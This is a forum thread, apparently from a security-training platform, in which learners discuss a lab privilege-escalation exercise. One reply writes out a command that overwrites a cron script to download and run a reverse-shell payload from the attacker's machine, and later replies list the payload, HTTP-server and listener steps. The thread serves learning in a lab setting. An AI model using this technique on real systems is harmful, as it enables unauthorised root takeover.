Blog Post
Me again, Linux 1 to 17 were a walk in the park compared to this. For the las question all the codes work fine and I establish to get meterpreter on Metasploit but when I use the command whoami it sates Kali as opposed to root. None of the commands for this qestion use the target IP, such as msvenom, metasploit and echo. What am I doing wrong? Thanks in advance
- Al13nz9 days ago
Bronze II
hi kevin1 I didn't go the metasploit route on this one but you're going to need to change the cronjob within the initial foothold shell when you are www-data. Run the command echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh in the www-data meterpreter session and that will privesc the second meterpreter session to root
(hope that makes sence!)- kevin18 days ago
Bronze II
Hi, unfortunately I'm no further forward, Metasploit didn't accept that command. Still just getting Kali after whoami. Please can some tech wizard on here show me the light 😁?! Thanks 🤞
- jamesstammers8 days ago
Bronze II
Have you created shell.elf to call back to the correct kali ip?
Are you hosting that file on a http server the whole time?
Do you have a listener open on the port you specified in msfvenom?
- kevin19 days ago
Bronze II
I'll try that later, and I'll let you know. Thanks for the update and support. I appreciate it